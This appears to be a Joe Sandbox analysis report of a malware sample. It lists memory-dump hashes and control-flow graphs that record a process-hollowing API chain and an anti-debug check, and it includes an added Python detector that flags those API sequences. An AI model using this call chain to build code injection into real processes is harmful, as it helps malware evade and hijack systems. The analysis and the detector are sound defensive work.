                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 7ea926d2183c77d1ba545daa5c02f79cc70e4b6f55f0b9d9c3b2ac14cf6b8e37
                                                                          • Instruction ID: cf14fffd90e852b525adf289d9bcaab7fefbcfa27aab37035bcf096042f176b2
                                                                          • Opcode Fuzzy Hash: 7ea926d2183c77d1ba545daa5c02f79cc70e4b6f55f0b9d9c3b2ac14cf6b8e37
                                                                          • Instruction Fuzzy Hash: 4B2113B1C0061A8BDB14CF9AD545BAEFBF0AB48320F14816AD858A7250D738A940CFA5

Control-flow Graph

control_flow_graph (rendered graph text, summarized): same function as above with a second entry at 109b650, five blocks. Block 109b650-109b69a branches to 109b69c-109b69f or directly to 109b6a2-109b6cd; 109b69c-109b69f continues to 109b6a2-109b6cd, which calls DeleteFileW and branches to 109b6cf-109b6d5 or 109b6d6-109b6fe; 109b6cf-109b6d5 continues to 109b6d6-109b6fe.
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0109B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 8c7cea09fe558acc5d3e42b34947f3b69628e8eff294482518d48e34174934d2
                                                                          • Instruction ID: f085c2d302cdcc8ecfd9f09d485eaf8716393ec5bec310a264dad28a09ec6267
                                                                          • Opcode Fuzzy Hash: 8c7cea09fe558acc5d3e42b34947f3b69628e8eff294482518d48e34174934d2
                                                                          • Instruction Fuzzy Hash: 421133B1C0061A9BCB14CF9AD544B9EFBF4BF48320F10816AD858B7250D738A940CFE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2870362953.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_f0d000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43e50882f26858171f3b7aca02a335ed3a1d19f213f827e77c0b67106b1678df
                                                                          • Instruction ID: a624a08e2741ab15b24ca3ac0e61bd1e39c9dbe70ded839e1445ebc3cb4aec36
                                                                          • Opcode Fuzzy Hash: 43e50882f26858171f3b7aca02a335ed3a1d19f213f827e77c0b67106b1678df
                                                                          • Instruction Fuzzy Hash: 89213471A04204DFDB10DF64C9C4B26BBA5FB84324F20C56DE84D4B29AC73AD846FA62
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2870362953.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_f0d000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction ID: bd3435334727746df6a7455efe7994d2d12001f3c094d6bb449bf4a3617dd8a8
                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction Fuzzy Hash: 3711D075904244CFDB11CF50D9C4B15BF62FB44324F24C6A9D8494B696C33AD84AEF51

                                                                          Execution Graph

                                                                          Execution Coverage:12.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:12%
                                                                          Total number of Nodes:25
                                                                          Total number of Limit Nodes:0
execution_graph (one connected component per line; each entry is node id, block address, optional API called, followed by id->id edges):
11357 7ffd9b8d1509 11359 7ffd9b8d1515 CreateProcessW 11357->11359 11360 7ffd9b8d175a 11359->11360
11361 7ffd9b8d188a 11362 7ffd9b8d1897 NtUnmapViewOfSection 11361->11362 11364 7ffd9b8d1989 11362->11364
11365 7ffd9b8d282a 11366 7ffd9b8d280a 11365->11366 11366->11365 11367 7ffd9b8d28af ResumeThread 11366->11367 11368 7ffd9b8d2915 11367->11368
11369 7ffd9b8b47a6 11370 7ffd9b8b47d1 VirtualProtect 11369->11370 11372 7ffd9b8b4908 11370->11372
11345 7ffd9b8d2275 11346 7ffd9b8d2283 Wow64SetThreadContext 11345->11346 11348 7ffd9b8d2369 11346->11348
11377 7ffd9b8d1c58 11378 7ffd9b8d1c69 VirtualAllocEx 11377->11378 11380 7ffd9b8d1d94 11378->11380
11353 7ffd9b8b0a0d 11354 7ffd9b8b0a1b FreeConsole 11353->11354 11356 7ffd9b8b0ae1 11354->11356
11373 7ffd9b8d1f1d 11374 7ffd9b8d1f87 WriteProcessMemory 11373->11374 11376 7ffd9b8d2076 11374->11376
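The eight API nodes in this execution graph (CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, plus VirtualProtect and FreeConsole) are the full process-hollowing chain, and reading them out of the graph text by hand is only practical for 25 nodes. The Python below is an added example for this report, not Joe Sandbox code: it parses the whitespace-separated graph text Joe emits (node id, block address or address range, optional API name or `call <addr>`, and `id->id` edges) into nodes and edges, maps each API to the block that calls it, and checks the result against a process-hollowing stage list and an anti-debug API list. The execution_graph string is copied from the report; the two control_flow_graph excerpts are constructed from graphs on this page (edges between other blocks omitted); the stage names, the alternative API names per stage, which stages count as required, and the anti-debug API set are the example's own assumptions.

```python
"""Parse Joe Sandbox graph text and flag process hollowing / anti-debug API use.

Added example for this report; not part of Joe Sandbox. Stage names, alternative API
names, the required-stage set and ANTI_DEBUG_APIS are assumptions of this example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Copied from the report's execution_graph text for process 41 (svchost).
EXECUTION_GRAPH = (
    "execution_graph "
    "11357 7ffd9b8d1509 11359 7ffd9b8d1515 CreateProcessW 11357->11359 11360 7ffd9b8d175a 11359->11360 "
    "11361 7ffd9b8d188a 11362 7ffd9b8d1897 NtUnmapViewOfSection 11361->11362 11364 7ffd9b8d1989 11362->11364 "
    "11365 7ffd9b8d282a 11366 7ffd9b8d280a 11365->11366 11366->11365 11367 7ffd9b8d28af ResumeThread "
    "11366->11367 11368 7ffd9b8d2915 11367->11368 "
    "11369 7ffd9b8b47a6 11370 7ffd9b8b47d1 VirtualProtect 11369->11370 11372 7ffd9b8b4908 11370->11372 "
    "11345 7ffd9b8d2275 11346 7ffd9b8d2283 Wow64SetThreadContext 11345->11346 11348 7ffd9b8d2369 11346->11348 "
    "11377 7ffd9b8d1c58 11378 7ffd9b8d1c69 VirtualAllocEx 11377->11378 11380 7ffd9b8d1d94 11378->11380 "
    "11353 7ffd9b8b0a0d 11354 7ffd9b8b0a1b FreeConsole 11353->11354 11356 7ffd9b8b0ae1 11354->11356 "
    "11373 7ffd9b8d1f1d 11374 7ffd9b8d1f87 WriteProcessMemory 11373->11374 11376 7ffd9b8d2076 11374->11376"
)
# Constructed excerpts of control_flow_graph text from process 37 (AddInProcess32) on this page.
CFG_ANTIDEBUG = (
    "control_flow_graph 2373 1097ed8-1097f64 CheckRemoteDebuggerPresent 2375 1097f6d-1097fa8 "
    "2373->2375 2376 1097f66-1097f6c 2373->2376 2376->2375"
)
CFG_SUBCALL = (
    "control_flow_graph 2141 6aafca6-6aafcaf 2143 6aafcb5-6aafce4 call 6aa9bf8 2141->2143 "
    "2134 6aafe78-6aafea7 LoadLibraryExW"
)

# Assumed stage model: each stage is satisfied by any one of its API names.
HOLLOWING_STAGES = {
    "spawn host":      {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "unmap host":      {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "allocate":        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write payload":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "set entry point": {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"},
    "resume":          {"ResumeThread", "NtResumeThread"},
}
HOLLOWING_REQUIRED = {"spawn host", "write payload", "set entry point", "resume"}
ANTI_DEBUG_APIS = {"CheckRemoteDebuggerPresent", "IsDebuggerPresent", "NtQueryInformationProcess"}


@dataclass
class Node:
    start: int                                     # first address of the basic block
    calls: List[str] = field(default_factory=list)  # API names, or sub_<addr> for "call <addr>"


_EDGE = re.compile(r"^(\d+)->(\d+)$")
_HEX = re.compile(r"^[0-9a-fA-F]+$")
_IDENT = re.compile(r"^[A-Za-z_]\w*$")


def parse_graph(text: str) -> Tuple[Dict[int, Node], List[Tuple[int, int]]]:
    """Tokenise one graph: 'id addr[-addr] {API | call addr}*' node entries and 'id->id' edges."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes: Dict[int, Node] = {}
    edges: List[Tuple[int, int]] = []
    i = 0
    while i < len(tokens):
        m = _EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        node_id = int(tokens[i])                       # node ids are decimal
        node = Node(start=int(tokens[i + 1].split("-")[0], 16))
        i += 2
        while i < len(tokens):                         # zero or more calls follow the address
            tok = tokens[i]
            if tok == "call":
                node.calls.append("sub_" + tokens[i + 1])
                i += 2
            elif _IDENT.match(tok) and not _HEX.match(tok):
                node.calls.append(tok)                 # a Windows API name
                i += 1
            else:
                break                                  # next node id or an edge
        nodes[node_id] = node
    return nodes, edges


def call_sites(nodes: Dict[int, Node]) -> Dict[str, int]:
    """Map each called API / sub-function to the start of the lowest block that calls it."""
    sites: Dict[str, int] = {}
    for node in sorted(nodes.values(), key=lambda n: n.start):
        for name in node.calls:
            sites.setdefault(name, node.start)
    return sites


def match_hollowing(apis) -> Tuple[bool, Dict[str, str], List[str]]:
    """True when every required stage has a matching API; also returns matched and missing stages."""
    matched, missing = {}, []
    for stage, names in HOLLOWING_STAGES.items():
        hit = sorted(names & set(apis))
        if hit:
            matched[stage] = hit[0]
        else:
            missing.append(stage)
    return HOLLOWING_REQUIRED.issubset(matched), matched, missing


def anti_debug_calls(apis) -> List[str]:
    return sorted(ANTI_DEBUG_APIS & set(apis))


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    sites = call_sites(nodes)
    ok, matched, missing = match_hollowing(sites)
    print(f"{len(nodes)} nodes, {len(edges)} edges; hollowing={ok}; missing={missing or 'none'}")
    for stage, api in matched.items():
        print(f"  {stage:15} {api:22} at {sites[api]:x}")
    print("anti-debug in CFG:", anti_debug_calls(call_sites(parse_graph(CFG_ANTIDEBUG)[0])))
```

Run as is and every hollowing stage resolves to a block in the 7ffd9b8d... range of process 41, which is the point of scoring the set rather than any single API: VirtualAllocEx plus WriteProcessMemory alone also describe ordinary remote injection, and the parser reports that case as missing the spawn, set-entry-point and resume stages. The same parser pulls CheckRemoteDebuggerPresent out of process 37's control-flow graph, so one tool covers both graph flavours Joe emits.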

Control-flow Graph

control_flow_graph (rendered graph text, summarized): function entered at 7ffd9b8bf3a3. Block 7ffd9b8bfaa6-7ffd9b8bfae3 calls the sub-functions at 7ffd9b8bc5f0 and 7ffd9b8be750; no Windows API calls appear in this graph, which ends at block 7ffd9b8bfd92-7ffd9b8bfdad.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (V_H
                                                                          • API String ID: 0-1775731446
                                                                          • Opcode ID: 8e0897a3649fc580fb5a52fece19df82357b904f3a637ce6b9f3da69041d757e
                                                                          • Instruction ID: 975e24c6f7593ddbf79fda2872c3442119fcee667b548f5d550b47c45d581ea9
                                                                          • Opcode Fuzzy Hash: 8e0897a3649fc580fb5a52fece19df82357b904f3a637ce6b9f3da69041d757e
                                                                          • Instruction Fuzzy Hash: 45325631F0EAAE0FE7A99B78487557477D1EF99300B0501BED48AC71E3ED18A9468BC1

Control-flow Graph

control_flow_graph (rendered graph text, summarized): function entered at 7ffd9b8d188a, three blocks. Block 7ffd9b8d188a-7ffd9b8d1987 calls NtUnmapViewOfSection and branches to either 7ffd9b8d1989 or 7ffd9b8d198f-7ffd9b8d19cf; 7ffd9b8d1989 continues to 7ffd9b8d198f-7ffd9b8d19cf.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: SectionUnmapView
                                                                          • String ID:
                                                                          • API String ID: 498011366-0
                                                                          • Opcode ID: e22fd87633089214f8a00c6f07e4e8f18fd988413d94fc030998b6dc121255cd
                                                                          • Instruction ID: d329ba8e68dd230291d6e45783d7cc419e7a9087678e87e596a2c090bd19fea3
                                                                          • Opcode Fuzzy Hash: e22fd87633089214f8a00c6f07e4e8f18fd988413d94fc030998b6dc121255cd
                                                                          • Instruction Fuzzy Hash: D8413B70A0864C8FDB94DF98D845BADBBF1FF9A310F1042AAD049D7256DB70A985CF41
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c59d71d1577ccbf441cf1ec3c955a95ac1a75d3fc04302bfb98ca70d0634029
                                                                          • Instruction ID: cb1a209a17c3a6098de255c63468c145cd149760bc98dafac48fea64c002a940
                                                                          • Opcode Fuzzy Hash: 5c59d71d1577ccbf441cf1ec3c955a95ac1a75d3fc04302bfb98ca70d0634029
                                                                          • Instruction Fuzzy Hash: CAA2683061DB5A4FE769DB38C4A44B5B7E1FF89301B0545BED48AC72A2DE34E946CB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c156393e80f07f2673d2c7b56dd209f10b3f2807f91669fe028ebd3d2abdc78
                                                                          • Instruction ID: 1d706852b9f8c55f9d8e38d6a20a20874d12565e1eccb2b6d879857b67adcfec
                                                                          • Opcode Fuzzy Hash: 6c156393e80f07f2673d2c7b56dd209f10b3f2807f91669fe028ebd3d2abdc78
                                                                          • Instruction Fuzzy Hash: B372787061DB4D4FD769EB28C4A04B577E1FF89300B0546BEE48AC72A6DE34E946CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 105abb2b45f5c3490e0c87948794ad71991103d366e99b264f81a61fb8ab7c5f
                                                                          • Instruction ID: 8333431bd690e5ba1b107b481581d7af2f42f6572c29d42dc60e912e5f82e723
                                                                          • Opcode Fuzzy Hash: 105abb2b45f5c3490e0c87948794ad71991103d366e99b264f81a61fb8ab7c5f
                                                                          • Instruction Fuzzy Hash: 18D18C3160DB9A4FE32DCB3884A11B5B7E1FFD9301B05467EE4C6C72A1DA24E546CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d91cd5f0255071c45e86ac349d7c2c1d227f8c14d00753eb74ef919a11718e4
                                                                          • Instruction ID: 0214164435ad8343cea8d1b5c1f50a045f2a15c75ec9f0e1d8d93c78361ea34f
                                                                          • Opcode Fuzzy Hash: 6d91cd5f0255071c45e86ac349d7c2c1d227f8c14d00753eb74ef919a11718e4
                                                                          • Instruction Fuzzy Hash: 3941777160D7890FC31E9B7488211B27BA1EB57310B1682BFD487CB1E7EC28AD468392

                                                                          Control-flow Graph
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 45ad662eb4f608ebaa577da2cfcedeb3b6fae8d31cbc3297cb8ac22ef565d512
                                                                          • Instruction ID: 8c6c3cafff8191e3cc9e980fe5d15f20843464fb4c23014d1f932383282a67e9
                                                                          • Opcode Fuzzy Hash: 45ad662eb4f608ebaa577da2cfcedeb3b6fae8d31cbc3297cb8ac22ef565d512
                                                                          • Instruction Fuzzy Hash: 75725A72A1EBC94FEB65CB6888655A87FE0FF55700F0A05FED089CB0A3DA346946C741

                                                                          Control-flow Graph (API call in graph: CreateProcessW)
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4ecc3033f7c0d3cff7a6536c835f3b63959edadec2bdf617e4e1d96f28114aa
                                                                          • Instruction ID: b357e20bed4db4b1bd956d436012917fbc39c77a4789a5daf402fa28ec6aaf82
                                                                          • Opcode Fuzzy Hash: a4ecc3033f7c0d3cff7a6536c835f3b63959edadec2bdf617e4e1d96f28114aa
                                                                          • Instruction Fuzzy Hash: CAA10570A08A1C8FDB98DF58C854BA9BBF1FB69311F1011AED44EE3291DB759985CF40

                                                                          Control-flow Graph (API call in graph: CreateProcessW)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c8b6ea07d181cac486f96b8700378542d3ed15e95af35511cb9ddc3426fd1027
                                                                          • Instruction ID: 73d2754adb30569fdf57e51bc7200fbe97198eab98298cfdbe3202a4e5d3c266
                                                                          • Opcode Fuzzy Hash: c8b6ea07d181cac486f96b8700378542d3ed15e95af35511cb9ddc3426fd1027
                                                                          • Instruction Fuzzy Hash: 09910270908A1C8FDB98DF58C894BA9BBF1FB69311F1001AED04EE32A1CB759984CF44

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e562446976ba51c34d08d696516e5e50a2145bab7cc88baa3638f79cf540818
                                                                          • Instruction ID: 5a0a344514c1d8536e8a6fe2c552abd933e9f8cff9267ea5fa89eb9c559fd7e9
                                                                          • Opcode Fuzzy Hash: 5e562446976ba51c34d08d696516e5e50a2145bab7cc88baa3638f79cf540818
                                                                          • Instruction Fuzzy Hash: 2291AE70A0964D8FDBA8EF68C855BE9BBF0FF59310F1002AED44DD7251DA35A985CB80

                                                                          Control-flow Graph (API call in graph: VirtualAllocEx)
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32ccfb5942e8386e0f16c45a17dce13e49648dcf87e6401b673cabce9332648b
                                                                          • Instruction ID: 2ec50b16231c124be2455551706238239f7e78f4ec57c0a445562d1deb991729
                                                                          • Opcode Fuzzy Hash: 32ccfb5942e8386e0f16c45a17dce13e49648dcf87e6401b673cabce9332648b
                                                                          • Instruction Fuzzy Hash: 9881B030A0DA4C8FDB98DF68C854BE9BBF1FB69314F0042AED04DD3252DA70A985CB41

                                                                          Control-flow Graph (API call in graph: VirtualProtect)
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b3000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08b16ae99dd00191669d3bacaa809e2ca9ee3a27da4b810d4002d1396c305f75
                                                                          • Instruction ID: ca855410ca1db984f78c28da4ba38a6b37242fd1597ac4aa0c89975091cd0c76
                                                                          • Opcode Fuzzy Hash: 08b16ae99dd00191669d3bacaa809e2ca9ee3a27da4b810d4002d1396c305f75
                                                                          • Instruction Fuzzy Hash: 6361907090975C8FDB58DFA8C895AE9BBF0FF1A300F1041AED049972A2DB74A945CF85

                                                                          Control-flow Graph (API call in graph: WriteProcessMemory)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 043e723a9044323e93b91e3fb777de977c6aa7a4469b196187d97d81422c6bd7
                                                                          • Instruction ID: 4e7700af655a0ab99d5dc4bf5376be38f201835bcb9c9daa04f1626ccab61521
                                                                          • Opcode Fuzzy Hash: 043e723a9044323e93b91e3fb777de977c6aa7a4469b196187d97d81422c6bd7
                                                                          • Instruction Fuzzy Hash: 86611370A08A5C8FDB98DF98D895BE9BBF1FB69310F1041AED04DE3251DB74A985CB40

                                                                          Control-flow Graph (API call in graph: VirtualProtect)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b3000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ce8b4227f19ddaa62054e0cd19ae38612401a43661d2768291ac931574e7a9db
                                                                          • Instruction ID: 2acf608d2c841fc0181f1fdfbeab180d1004b55fc532fa06fafa9e09ddefc1fd
                                                                          • Opcode Fuzzy Hash: ce8b4227f19ddaa62054e0cd19ae38612401a43661d2768291ac931574e7a9db
                                                                          • Instruction Fuzzy Hash: A2517F7090874C8FDB58DF68C855BE9BBF0FB5A310F1402AED449E3292DB74A985CB81

                                                                          Control-flow Graph (API call in graph: WriteProcessMemory)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 4cb1845d1be91cbec5b0c0955f6ba0171e89f8a09f80f3ec7b9703f1c2ca83d5
                                                                          • Instruction ID: 46b81132d4f2a96ea247a5d56da60b7f5ba4b1d16cc3f25dfae22a62e5e6f077
                                                                          • Opcode Fuzzy Hash: 4cb1845d1be91cbec5b0c0955f6ba0171e89f8a09f80f3ec7b9703f1c2ca83d5
                                                                          • Instruction Fuzzy Hash: 3D515870908A4C8FDB98DF58D885BE9BBF1FB6A310F1041AED44DE7252DA70A985CF40

                                                                          Control-flow Graph (API call in graph: VirtualAllocEx)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 20ac76e6a955cca3e58c9c3ddd0565c720da8ba0d44e2ecc47a680a0b68dc6af
                                                                          • Instruction ID: 20850abe8cf8f3365bc1f7db3987cbaecfc788ac1b8bf22bf7a3d626436f3c53
                                                                          • Opcode Fuzzy Hash: 20ac76e6a955cca3e58c9c3ddd0565c720da8ba0d44e2ecc47a680a0b68dc6af
                                                                          • Instruction Fuzzy Hash: 6151F470A08A1C8FDF98EF58C895BE9BBF1FB69314F1051AAD44DE3251DB70A981CB44

                                                                          Control-flow Graph (API call in graph: Wow64SetThreadContext)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 5851f8dc239618a294181019a233860330136d39a1f2f818bdd8dff9febdcaae
                                                                          • Instruction ID: c8fccb0acd1c6b851b90b33cfc15f28dd9aa7c412b4171415abd885af74f0b36
                                                                          • Opcode Fuzzy Hash: 5851f8dc239618a294181019a233860330136d39a1f2f818bdd8dff9febdcaae
                                                                          • Instruction Fuzzy Hash: 45417C30A0864D8FDBA8DFA8D845BEDBBF1FB99310F20426AD049D7256D7309985CF40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: cd61050e516d2f38c253723b35e3f33c77bbdffbfe98725e39941cb8c75b4584
                                                                          • Instruction ID: 0b7732e6bf7dd788455232b13cf4e395786b3f68e06db2034227aa7c3a7e6dad
                                                                          • Opcode Fuzzy Hash: cd61050e516d2f38c253723b35e3f33c77bbdffbfe98725e39941cb8c75b4584
                                                                          • Instruction Fuzzy Hash: 2E415C70E0864C8FDB98DF98D895BEDBBF1EB59310F1041AAD00DD7292DA34A846CB40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
